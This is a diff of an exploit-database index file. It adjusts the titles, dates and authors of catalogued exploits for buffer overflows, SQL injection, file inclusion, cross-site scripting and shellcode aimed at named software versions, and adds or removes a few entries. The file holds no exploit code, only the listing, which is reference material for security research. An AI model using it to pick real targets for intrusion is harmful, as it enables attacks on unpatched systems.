-5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
+5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
-5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
+5249,platforms/windows/remote/5249.pl,"MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
 5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0
 5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
 5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow",2008-03-16,h07,windows,remote,0
@@ -10905,7 +10911,7 @@ id,file,description,date,author,platform,type,port
 17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0
 17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe ovutil Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0
 17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit)",2011-03-25,Metasploit,windows,remote,0
-17048,platforms/windows/remote/17048.rb,"VideoLAN VLC Media Player - AMV Dangling Pointer (Metasploit)",2011-03-26,Metasploit,windows,remote,0
+17048,platforms/windows/remote/17048.rb,"VideoLAN VLC Media Player 1.1.4 - 'AMV' Dangling Pointer (Metasploit)",2011-03-26,Metasploit,windows,remote,0
 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0
 17058,platforms/linux/remote/17058.rb,"Distributed Ruby - Send instance_eval/syscall Code Execution (Metasploit)",2011-03-27,Metasploit,linux,remote,0
 17063,platforms/windows/remote/17063.txt,"Easy File Sharing Web Server 5.8 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote,0
@@ -10928,7 +10934,7 @@ id,file,description,date,author,platform,type,port
 17243,platforms/windows/remote/17243.txt,"SPlayer 3.7 (build 2055) - Buffer Overflow",2011-05-04,xsploitedsec,windows,remote,0
 17240,platforms/windows/remote/17240.html,"ICONICS WebHMI - ActiveX Stack Overflow",2011-05-03,"sgb and bls",windows,remote,0
 17244,platforms/hardware/remote/17244.txt,"ZyWALL USG - Appliance - Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",hardware,remote,0
-17252,platforms/windows/remote/17252.rb,"VideoLAN VLC Media Player - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,remote,0
+17252,platforms/windows/remote/17252.rb,"VideoLAN VLC Media Player 1.1.8 - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,remote,0
 17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 - Content-Type Buffer Overflow (Metasploit)",2011-05-11,Metasploit,windows,remote,0
 17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI - ActiveX Buffer Overflow (Metasploit)",2011-05-10,Metasploit,windows,remote,0
 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download",2011-05-13,LiquidWorm,hardware,remote,0
@@ -11147,7 +11153,7 @@ id,file,description,date,author,platform,type,port
 18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0
 18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 - GetObject (Metasploit)",2012-05-01,Metasploit,windows,remote,0
 18818,platforms/windows/remote/18818.py,"SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection",2012-05-01,muts,windows,remote,0
-18825,platforms/windows/remote/18825.rb,"VideoLAN VLC Media Player - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,windows,remote,0
+18825,platforms/windows/remote/18825.rb,"VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,windows,remote,0
 18834,platforms/php/remote/18834.rb,"PHP - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,php,remote,0
 18836,platforms/php/remote/18836.py,"PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection",2012-05-05,rayh4c,php,remote,0
 18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
@@ -13788,6 +13794,7 @@ id,file,description,date,author,platform,type,port
 31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Cross-Site Request Forgery",2008-02-11,nnposter,hardware,remote,0
 31149,platforms/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x - Backslash Directory Traversal",2008-02-11,"Luigi Auriemma",windows,remote,0
 31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service",2008-02-12,"Luigi Auriemma",windows,remote,0
+40760,platforms/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - SEH Overflow (Metasploit)",2016-11-15,"Tracy Turben",windows,remote,0
 31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0
 31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0
 31181,platforms/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,windows,remote,5555
@@ -15019,7 +15026,7 @@ id,file,description,date,author,platform,type,port
 40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80
 40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
 40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0
-40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
+40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
 40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
 40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
 40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
@@ -15056,13 +15063,14 @@ id,file,description,date,author,platform,type,port
 40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
 40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
 40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
-40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise - Login Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
+40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
 40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40736,platforms/hardware/remote/40736.txt,"NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40737,platforms/hardware/remote/40737.sh,"NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40738,platforms/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40740,platforms/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547
+40767,platforms/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -17344,7 +17352,7 @@ id,file,description,date,author,platform,type,port
 3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog 2.52 - (postid) Blind SQL Injection",2007-04-03,ajann,php,webapps,0
 3656,platforms/php/webapps/3656.pl,"WordPress 2.1.2 - 'xmlrpc' SQL Injection",2007-04-03,"Sumit Siddharth",php,webapps,0
 3657,platforms/php/webapps/3657.txt,"MySpeach 3.0.7 - Remote / Local File Inclusion",2007-04-03,Xst3nZ,php,webapps,0
-3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - (customize.php l) Remote File Inclusion",2007-04-04,frog-m@n,php,webapps,0
+3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion",2007-04-04,frog-m@n,php,webapps,0
 3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusion",2007-04-04,kezzap66345,php,webapps,0
 3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0
 3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0
@@ -17625,8 +17633,8 @@ id,file,description,date,author,platform,type,port
 4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0
 4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - 'wp-app.php' Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps,0
 4114,platforms/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0
-4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
+4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Parameter Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
-4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - (qti_checkname.php) Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
+4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
 4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 - SQL Injection / Cross-Site Scripting",2007-06-28,GoLd_M,php,webapps,0
 4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum 6.4.4 - Local File Inclusion",2007-06-28,Katatafish,php,webapps,0
 4125,platforms/php/webapps/4125.txt,"WebChat 0.78 - (login.php rid) SQL Injection",2007-06-28,r00t,php,webapps,0
@@ -18354,34 +18362,34 @@ id,file,description,date,author,platform,type,port
 5203,platforms/php/webapps/5203.txt,"PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection",2008-02-28,"Aria-Security Team",php,webapps,0
 5204,platforms/php/webapps/5204.py,"Centreon 1.4.2.3 - 'get_image.php' Remote File Disclosure",2008-02-28,"Julien CAYSSOL",php,webapps,0
 5206,platforms/php/webapps/5206.txt,"Dream4 Koobi CMS 4.3.0 < 4.2.3 - 'categ' Parameter SQL Injection",2008-02-29,JosS,php,webapps,0
-5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica - 'id' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
+5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica - 'id' Parameter SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
-5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - (userid) SQL Injection",2008-03-01,"SoSo H H",php,webapps,0
+5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - 'userid' Parameter SQL Injection",2008-03-01,"SoSo H H",php,webapps,0
-5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - (mod_project_id) SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0
+5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - 'mod_project_id' Parameter SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0
-5211,platforms/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - 'albumID' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
+5211,platforms/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - 'albumID' Parameter SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
 5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart - SQL Injection",2008-03-04,bius,php,webapps,0
-5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - 'sid' SQL Injection",2008-03-06,S@BUN,php,webapps,0
+5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - 'sid' Parameter SQL Injection",2008-03-06,S@BUN,php,webapps,0
-5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads - 'cid' SQL Injection",2008-03-06,S@BUN,php,webapps,0
+5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads - 'cid' Parameter SQL Injection",2008-03-06,S@BUN,php,webapps,0
 5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 <= 2.3 - Remote Add Admin",2008-03-07,"Charles Fol",php,webapps,0
 5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 <= 2.3 - Arbitrary File Upload",2008-03-07,"Charles Fol",php,webapps,0
-5221,platforms/php/webapps/5221.txt,"Joomla! Component Candle 1.0 - (cID) SQL Injection",2008-03-08,S@BUN,php,webapps,0
+5221,platforms/php/webapps/5221.txt,"Joomla! Component Candle 1.0 - 'cid' Parameter SQL Injection",2008-03-08,S@BUN,php,webapps,0
-5222,platforms/php/webapps/5222.txt,"QuickTicket 1.5 - (qti_usr.php id) SQL Injection",2008-03-09,croconile,php,webapps,0
+5222,platforms/php/webapps/5222.txt,"QuickTicket 1.5 - 'qti_usr.php' SQL Injection",2008-03-09,croconile,php,webapps,0
 5223,platforms/php/webapps/5223.txt,"BM Classifieds 20080409 - Multiple SQL Injections",2008-03-09,xcorpitx,php,webapps,0
-5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - (cat) SQL Injection",2008-03-10,Don,php,webapps,0
+5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - 'cat' Parameter SQL Injection",2008-03-10,Don,php,webapps,0
-5231,platforms/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - (archives.php msg_id) SQL Injection",2008-03-10,"Charles Fol",php,webapps,0
+5231,platforms/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - 'msg_id' Parameter SQL Injection",2008-03-10,"Charles Fol",php,webapps,0
-5232,platforms/php/webapps/5232.txt,"Mapbender 2.4.4 - (mapFiler.php) Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps,0
+5232,platforms/php/webapps/5232.txt,"Mapbender 2.4.4 - 'mapFiler.php' Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps,0
-5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - (gaz) SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps,0
+5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - 'gaz' Parameter SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps,0
 5234,platforms/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,php,webapps,0
-5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase - 'id' SQL Injection",2008-03-11,t0pP8uZz,php,webapps,0
+5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase 2.0 - 'id' Parameter SQL Injection",2008-03-11,t0pP8uZz,php,webapps,0
 5237,platforms/php/webapps/5237.txt,"Joomla! Component ProductShowcase 1.5 - SQL Injection",2008-03-11,S@BUN,php,webapps,0
 5239,platforms/php/webapps/5239.php,"Danneo CMS 0.5.1 - Blind SQL Injection",2008-03-11,InATeam,php,webapps,0
 5240,platforms/php/webapps/5240.htm,"QuickTalk Forum 1.6 - Blind SQL Injection",2008-03-12,t0pP8uZz,php,webapps,0
-5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - (gid) SQL Injection",2008-03-12,S@BUN,php,webapps,0
+5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - 'gid' Parameter SQL Injection",2008-03-12,S@BUN,php,webapps,0
-5242,platforms/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 - (gid) SQL Injection",2008-03-12,S@BUN,php,webapps,0
+5242,platforms/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 - 'gid' Parameter SQL Injection",2008-03-12,S@BUN,php,webapps,0
 5243,platforms/php/webapps/5243.txt,"Fully Modded phpBB - 'kb.php' SQL Injection",2008-03-12,TurkishWarriorr,php,webapps,0
 5244,platforms/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 - SQL Injection",2008-03-12,S@BUN,php,webapps,0
-5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0
+5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials 2.1b - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0
 5246,platforms/php/webapps/5246.txt,"EasyCalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
-5247,platforms/php/webapps/5247.txt,"easygallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
+5247,platforms/php/webapps/5247.txt,"EasyGallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
 5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) SQL Injection",2008-03-14,S@BUN,php,webapps,0
 5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) SQL Injection",2008-03-14,S@BUN,php,webapps,0
 5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - (kid) SQL Injection",2008-03-14,S@BUN,php,webapps,0
@@ -19179,7 +19187,7 @@ id,file,description,date,author,platform,type,port
 6249,platforms/php/webapps/6249.txt,"ZeeJobsite 2.0 - (adid) SQL Injection",2008-08-15,"Hussin X",php,webapps,0
 6250,platforms/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,"Khashayar Fereidani",php,webapps,0
 6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps,0
-6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - (cat) SQL Injection",2008-08-17,"Hussin X",php,webapps,0
+6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - 'cat' Parameter SQL Injection",2008-08-17,"Hussin X",php,webapps,0
 6258,platforms/php/webapps/6258.txt,"PHPBasket - 'product.php pro_id' SQL Injection",2008-08-17,r45c4l,php,webapps,0
 6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) - Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0
 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,php,webapps,0
@@ -20605,7 +20613,7 @@ id,file,description,date,author,platform,type,port
 8210,platforms/php/webapps/8210.txt,"UBB.Threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0
 8216,platforms/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection",2009-03-16,SirGod,php,webapps,0
 8217,platforms/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection / SQL Injection",2009-03-16,SirGod,php,webapps,0
-8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - (entry_id) SQL Injection",2009-03-16,boom3rang,php,webapps,0
+8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - 'entry_id' Parameter SQL Injection",2009-03-16,boom3rang,php,webapps,0
 8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0
 8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0
 8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0
@@ -21237,7 +21245,7 @@ id,file,description,date,author,platform,type,port
 9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Authentication Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
 9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusion",2009-07-27,GoLd_M,php,webapps,0
 9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0
-9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - (linkout.php id) SQL Injection",2009-07-28,MizoZ,php,webapps,0
+9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - 'id' Parameter SQL Injection",2009-07-28,MizoZ,php,webapps,0
 9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod 2.0.4 - Blind SQL Injection",2009-07-28,Dante90,php,webapps,0
 9290,platforms/php/webapps/9290.txt,"In-portal 4.3.1 - Arbitrary File Upload",2009-07-28,Mr.tro0oqy,php,webapps,0
 9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0
@@ -22008,7 +22016,7 @@ id,file,description,date,author,platform,type,port
 10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0
 10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - (Authentication Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
 10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
-10873,platforms/php/webapps/10873.txt,"Myiosoft EasyGallery - 'catid' Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0
+10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Parameter Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0
 10874,platforms/php/webapps/10874.txt,"Pre News Manager - (nid) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
 10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz - SQL Injection",2009-12-31,"Hussin X",php,webapps,0
 10877,platforms/php/webapps/10877.txt,"PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
@@ -28846,11 +28854,6 @@ id,file,description,date,author,platform,type,port
 27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 - show.php MainID SQL Injection",2006-03-04,Mr.SNAKE,php,webapps,0
 27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 - comment.php UserID Parameter Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0
 27348,platforms/php/webapps/27348.txt,"VBZooM Forum 1.11 - contact.php UserID Parameter Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0
-27349,platforms/php/webapps/27349.txt,"phpArcadeScript 2.0 - tellafriend.php gamename Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
-27350,platforms/php/webapps/27350.txt,"phpArcadeScript 2.0 - loginbox.php login_status Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
-27351,platforms/php/webapps/27351.txt,"phpArcadeScript 2.0 - 'index.php' submissionstatus Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
-27352,platforms/php/webapps/27352.txt,"phpArcadeScript 2.0 - browse.php Multiple Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
-27353,platforms/php/webapps/27353.txt,"phpArcadeScript 2.0 - displaygame.php gamefile Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
 27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 - New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0
 27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - misc.php Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0
 27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 - Title Field HTML Injection",2006-03-06,Kiki,php,webapps,0
@@ -29116,7 +29119,6 @@ id,file,description,date,author,platform,type,port
 28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0
 28054,platforms/php/webapps/28054.txt,"WordPress Plugin IndiaNIC Testimonial - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0
 27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - Common.php Remote File Inclusion",2006-04-20,r0t,php,webapps,0
-27708,platforms/php/webapps/27708.txt,"EasyGallery 1.17 - EasyGallery.php Cross-Site Scripting",2006-04-20,botan,php,webapps,0
 27709,platforms/php/webapps/27709.txt,"4homepages 4Images 1.7 - member.php Cross-Site Scripting",2006-04-20,Qex,php,webapps,0
 27710,platforms/php/webapps/27710.txt,"W2B Online Banking - SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0
 27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
@@ -30084,7 +30086,6 @@ id,file,description,date,author,platform,type,port
 29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - Announce.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
 29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 - blog.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
 29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0
-29052,platforms/php/webapps/29052.txt,"Bloo 1.00 - Googlespell_Proxy.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
 29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0
 29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0
 29055,platforms/php/webapps/29055.txt,"Eggblog 3.1 - admin/articles.php edit Parameter Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
@@ -31429,7 +31430,6 @@ id,file,description,date,author,platform,type,port
 31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component - SQL Injection",2008-02-12,S@BUN,php,webapps,0
 31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0
 31258,platforms/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps,0
-31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection",2008-03-04,bius,php,webapps,0
 31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0
